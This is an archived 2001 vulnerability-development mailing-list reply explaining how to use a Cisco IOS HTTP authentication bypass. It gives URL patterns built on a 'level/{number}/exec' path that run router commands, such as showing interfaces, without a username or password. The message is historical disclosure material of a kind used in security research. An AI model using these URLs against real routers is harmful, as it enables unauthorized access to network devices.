Vulnerability Development mailing list archives

Re[2]: Cisco IOS HTTP Configuration Exploit

From: Ertan Kurt <ertank () olympos org>
Date: Mon, 2 Jul 2001 12:37:26 +0300

BT> Does it mean that when i enter the URL i will not be prompted to enter the username and password??

Yes, just use the perl script (check previous mail) on a http server enabled cisco
router and if it says smtg like:
Vulnerable with {number}
just use that number as shown below:
http://routerIP/level/{number}/exec/-
or send commands directly:
http:///routerIP/level/{number}/exec/-/sh/ip/interface/brief/CR

it will not ask you to provide a username and pass.

Regards,

Ertan Kurt

***cut***